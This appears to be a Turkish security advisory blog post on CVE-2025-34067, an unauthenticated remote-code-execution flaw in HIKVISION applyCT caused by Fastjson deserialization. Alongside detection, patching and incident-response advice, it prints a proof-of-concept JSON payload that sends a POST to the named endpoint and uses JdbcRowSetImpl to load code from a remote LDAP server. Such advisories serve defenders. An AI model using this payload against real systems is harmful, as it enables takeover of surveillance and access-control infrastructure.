HIKVISION’ın yaygın olarak kullanılan güvenlik yönetim platformu applyCT’de (önceki adıyla HikCentral) kritik bir güvenlik açığı keşfedildi. CVE-2025-34067 olarak kayıtlara geçen ve CVSS v4 ölçeğinde maksimum 10.0 şiddet derecesine sahip bu zafiyet, kimlik doğrulaması gerektirmeden uzaktan kod çalıştırılmasına (RCE) olanak tanıyor. Fastjson kütüphanesindeki deserialization zayıflığından kaynaklanan bu açık, kurumsal güvenlik altyapıları için ciddi risk oluşturuyor.
Teknik Analiz
Etkilenen Platform
HIKVISION applyCT, ticari, devlet ve endüstriyel sektörlerde güvenlik cihazlarının merkezi olarak izlenmesi ve yönetilmesi için kullanılan entegre bir platformdur. İleri analitik yetenekleri ve ölçeklenebilir mimarisi sayesinde yüksek güvenlikli ortamlarda tercih edilen bu platform, ne yazık ki güvenlik açığı barındıran eski bir Fastjson kütüphanesi versiyonu kullanmaktadır.
Güvenlik Açığının Kök Nedeni
Zafiyet, /bic/ssoService/v1/applyCT endpoint’inde JSON payload’larının işlenme şeklinden kaynaklanmaktadır. Fastjson kütüphanesinin “auto-type” özelliği, Java sınıflarının dinamik olarak yüklenmesine izin verir. Bu özellik uygun şekilde yapılandırılmadığında, saldırganlar sistemde istedikleri kodu çalıştırabilecek kötü niyetli JSON nesneleri gönderebilirler.
Sömürü Mekanizması
Saldırı vektörü oldukça basit ancak etkilidir:
- Hedef Endpoint:
/bic/ssoService/v1/applyCT - HTTP Metodu: POST
- Content-Type: application/json
- Kimlik Doğrulama: Gerekli değil
Saldırganlar, özel olarak hazırlanmış bir JSON payload göndererek sistemin uzak bir LDAP sunucusundan Java sınıfı yüklemesini sağlayabilirler. İşte basitleştirilmiş bir proof-of-concept örneği:
json{
"a": {
"@type": "java.lang.Class",
"val": "com.sun.rowset.JdbcRowSetImpl"
},
"b": {
"@type": "com.sun.rowset.JdbcRowSetImpl",
"dataSourceName": "ldap://xxx.xxx.xxx.xxx/Basic/TomcatEcho",
"autoCommit": true
},
"hfe4zyyzldp": "="
}Bu payload’da JdbcRowSetImpl sınıfı kullanılarak, saldırgan kontrolündeki bir LDAP sunucusuna bağlantı kurulması sağlanır. dataSourceName parametresi manipüle edilerek, sistem güvenilmeyen bir kaynaktan kod yüklemesi için kandırılır.
Teknik Detaylar
Deserialization Saldırısı: Fastjson’ın auto-type özelliği, JSON string’lerini Java nesnelerine dönüştürürken tip bilgisini de içerebilir. Bu mekanizma, @type alanı üzerinden istenen herhangi bir Java sınıfının örneklenmesine izin verir.
JNDI Injection: JdbcRowSetImpl sınıfının dataSourceName özelliği JNDI (Java Naming and Directory Interface) lookup’ı tetikler. Saldırgan kontrolündeki LDAP sunucusuna yönlendirme yapılarak, uzaktan kod yükleme ve çalıştırma sağlanır.
Kimlik Doğrulamasız Erişim: En kritik nokta, bu endpoint’in herhangi bir kimlik doğrulama mekanizması gerektirmemesidir. İnternet üzerinden erişilebilir durumdaki sistemler doğrudan hedef alınabilir.
Potansiyel Etkiler
HIKVISION platformları genellikle kritik fiziksel güvenlik sistemlerini yönetmek için kullanıldığından, bu zafiyet hem siber güvenlik hem de fiziksel güvenlik açısından ciddi riskler barındırır:
Operasyonel Riskler
- Gözetim Sistemlerinin Ele Geçirilmesi: Kamera görüntülerinin manipülasyonu veya devre dışı bırakılması
- Güvenlik Akışlarının Kesintiye Uğratılması: Canlı izleme ve kayıt fonksiyonlarının sabote edilmesi
- Erişim Kontrol Sistemlerinin Tehlikeye Atılması: Kapı kontrol sistemleri ve alarm mekanizmalarının manipülasyonu
Ağ Güvenliği Riskleri
- Lateral Movement: Ele geçirilen sistem üzerinden iç ağda yayılma
- Veri Sızıntısı: Hassas güvenlik verilerine erişim
- Kalıcılık Sağlama: Sistem üzerinde backdoor yerleştirme
- Gelişmiş Saldırı Kampanyaları: İlk giriş noktası olarak kullanım
Tespit ve Önleme Stratejileri
Acil Aksiyon Önerileri
- Endpoint Denetimi
/bic/ssoService/v1/applyCTendpoint’inin internete açık olup olmadığını kontrol edin- Web application firewall (WAF) loglarını inceleyin
- Anormal POST isteklerini tespit etmek için IDS/IPS kuralları oluşturun
- Güncelleme ve Yama Yönetimi
- HIKVISION’dan güncel firmware/yazılım sürümlerini edinin
- Fastjson kütüphanesini güvenli bir versiyona yükseltin
- Tüm bağımlılıkları (dependency) güncelleyin
- Ağ Segmentasyonu
- Güvenlik yönetim sistemlerini izole VLAN’larda konumlandırın
- İnternet erişimini sadece gerekli durumlarda ve kontrollü şekilde sağlayın
- Jump server veya VPN üzerinden erişim zorunluluğu getirin
- İzleme ve Log Analizi
Şüpheli aktivite göstergeleri: - /bic/ssoService/v1/applyCT endpoint'ine gelen POST istekleri - JSON payload'larında @type alanı içeren istekler - Dış LDAP sunucularına yapılan bağlantı denemeleri - java.lang.Class veya JdbcRowSetImpl referansları
Uzun Vadeli Güvenlik Önlemleri
Application Security Testing: Düzenli penetrasyon testleri ve kod analizleri yapın. Özellikle deserialization noktalarına odaklanın.
Zero Trust Architecture: Güvenlik cihazları için bile “güven ama doğrula” prensibi uygulayın. Her erişim noktasında kimlik doğrulama ve yetkilendirme mekanizmaları olmalı.
Threat Intelligence Integration: CVE veritabanlarını ve güvenlik bültenlerini aktif olarak takip edin. Otomatik güvenlik açığı tarama araçları kullanın.
Incident Response Önerileri
Eğer sisteminizin bu zafiyetten etkilendiğinden şüpheleniyorsanız:
- İzolasyon: Etkilenen sistemleri hemen ağdan izole edin
- Forensik Analiz:
- Web sunucu loglarını inceleyin
- Sistem process’lerini kontrol edin
- Network trafiğini analiz edin
- Temizleme:
- Şüpheli process’leri sonlandırın
- Persistence mekanizmalarını temizleyin
- Sistemleri güvenli backup’lardan restore edin
- Güçlendirme: Yukarıda belirtilen güvenlik önlemlerini uygulayın
Sonuç
CVE-2025-34067, modern güvenlik sistemlerinin bile temel yazılım güvenliği prensiplerini ihmal ettiğinde ne kadar savunmasız kalabileceğini göstermektedir. CVSS 10.0 skoruyla maksimum tehlike seviyesinde olan bu zafiyet, özellikle kritik altyapıları koruyan sistemlerde acil müdahale gerektirmektedir.
Network güvenlik profesyonelleri olarak, sadece dış tehditlere değil, güvendiğimiz sistemlerin içindeki zayıflıklara da odaklanmalıyız. Bu olay, vendor güvenlik güncellemelerinin takibi, proaktif güvenlik testleri ve derinlemesine savunma stratejilerinin önemini bir kez daha vurgulamaktadır.
Unutmayın: Güvenlik sistemlerinizin kendisi de bir saldırı vektörü olabilir. Bu nedenle, tüm sistemleri – özellikle de güvenlik amaçlı olanları – düzenli olarak denetlemeli ve güncel tutmalıyız.Retry
About the Author
